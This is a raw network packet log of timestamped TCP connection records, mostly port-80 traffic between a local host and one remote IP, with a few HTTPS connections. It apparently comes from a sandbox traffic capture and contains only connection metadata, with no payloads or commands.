Nov 2, 2024 17:56:25.332546949 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.332565069 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.333233118 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.333259106 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.333267927 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.333285093 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.333297968 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.333319902 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.333333969 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.333420992 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.333431959 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.333462000 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.333476067 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.416903019 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.416920900 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.416979074 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417073965 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417085886 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417105913 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417112112 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417118073 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417130947 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417140007 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417171955 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417409897 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417429924 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417449951 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417467117 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417526960 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417562008 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417577982 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417589903 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417618036 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417630911 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417766094 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417783976 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.417804956 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.417815924 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.448978901 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.448993921 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449006081 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449060917 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449083090 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449112892 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449150085 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449151993 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449186087 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449218035 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449254036 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449280977 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449317932 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449347019 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449358940 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449383974 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449398041 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449610949 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449645996 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449675083 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449687004 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.449712038 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.449724913 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.450512886 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.450535059 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.450553894 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.450575113 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.450578928 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.450619936 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.450699091 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.450712919 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.450740099 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.450751066 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.450823069 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.450872898 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.527229071 CET	443	49711	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.541039944 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541057110 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541069031 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541151047 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541194916 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541198969 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541208029 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541219950 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541233063 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541235924 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541244984 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541274071 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541487932 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541524887 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541599989 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541611910 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541635990 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541647911 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541764021 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541775942 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.541812897 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.541812897 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.566338062 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566360950 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566443920 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.566451073 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566494942 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.566584110 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566596985 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566629887 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.566719055 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566731930 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566770077 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.566975117 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566987991 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.566998959 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.567025900 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.567038059 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.568032026 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.568057060 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.568068981 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.568082094 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.568099976 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.568227053 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.568238974 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.568272114 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.568310976 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.568320990 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.568366051 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.571147919 CET	443	49712	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.578089952 CET	49711	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.591444969 CET	443	49713	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.617419004 CET	49711	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.617451906 CET	443	49711	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.617949009 CET	49711	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.617954969 CET	443	49711	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.619220972 CET	49712	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.619266987 CET	443	49712	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.619618893 CET	49712	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.619626045 CET	443	49712	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.620012999 CET	49713	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.620028019 CET	443	49713	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.620397091 CET	49713	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.620403051 CET	443	49713	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.658243895 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.658269882 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.658334970 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.658340931 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.658361912 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.658385992 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.658396006 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.658405066 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.658415079 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.658416986 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.658440113 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.658473969 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.659415960 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.659459114 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.659461021 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.659476042 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.659507990 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.659533024 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.659616947 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.659629107 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.659640074 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.659651041 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.659657001 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.659662008 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.659676075 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.659704924 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.676990986 CET	443	49714	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.683700085 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.683752060 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.683779955 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.683795929 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.683826923 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.683837891 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.683856964 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.683856964 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.683871031 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.684041023 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.684052944 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.684065104 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.684076071 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.684092045 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.684108019 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.684129953 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.684670925 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.684679985 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.684709072 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.684721947 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.685417891 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.685460091 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.685480118 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.685493946 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.685520887 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.685538054 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.685636997 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.685648918 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.685671091 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.685683012 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.718699932 CET	49714	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.732933044 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.732985020 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.732996941 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.733001947 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.733031034 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.748878956 CET	443	49713	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.748944998 CET	443	49713	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.749017000 CET	49713	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.775572062 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.775588989 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.775655031 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.775760889 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.775773048 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.775784016 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.775796890 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.775808096 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.775829077 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.775857925 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.775890112 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.775902987 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.775929928 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.775940895 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.776082993 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.776093960 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.776107073 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.776115894 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.776128054 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.776153088 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.776549101 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.776609898 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.776638985 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.776649952 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.776669979 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.776679993 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.801630020 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.801685095 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.801701069 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.801712990 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.801737070 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.801759958 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.801795006 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.801826954 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.801898956 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.801911116 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.801928997 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.801953077 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802342892 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.802352905 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.802366972 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.802378893 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802390099 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802408934 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802457094 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.802494049 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802519083 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.802553892 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802556038 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.802589893 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802674055 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.802716017 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.802721977 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802747011 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.802969933 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.803006887 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.803034067 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.803045034 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.803066015 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.803078890 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.803148031 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.803181887 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.803214073 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.803245068 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.803322077 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.803359985 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.803399086 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.803431988 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.850377083 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.850389957 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.850402117 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.850439072 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.850481987 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.881711006 CET	49714	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.881746054 CET	443	49714	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.882225990 CET	49714	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.882236958 CET	443	49714	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.885407925 CET	49713	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.885430098 CET	443	49713	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.885440111 CET	49713	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.885447979 CET	443	49713	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.892946005 CET	49715	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.892950058 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.892972946 CET	443	49715	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.892992973 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893014908 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893027067 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893032074 CET	49715	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.893054962 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893069983 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893107891 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893117905 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893163919 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893201113 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893238068 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893311977 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893323898 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893347979 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893358946 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893441916 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893479109 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893538952 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893573999 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893667936 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893681049 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893704891 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893716097 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893826962 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893842936 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.893882036 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.893882036 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.894083023 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.894114971 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.894119978 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.894125938 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.894150019 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.894160986 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.919110060 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919162035 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919173956 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919202089 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.919239044 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.919301033 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919336081 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.919737101 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919764996 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919770956 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.919776917 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919800043 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.919811010 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.919939041 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919950008 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919970036 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.919972897 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.919987917 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920005083 CET	49700	80	192.168.2.7	62.204.41.163
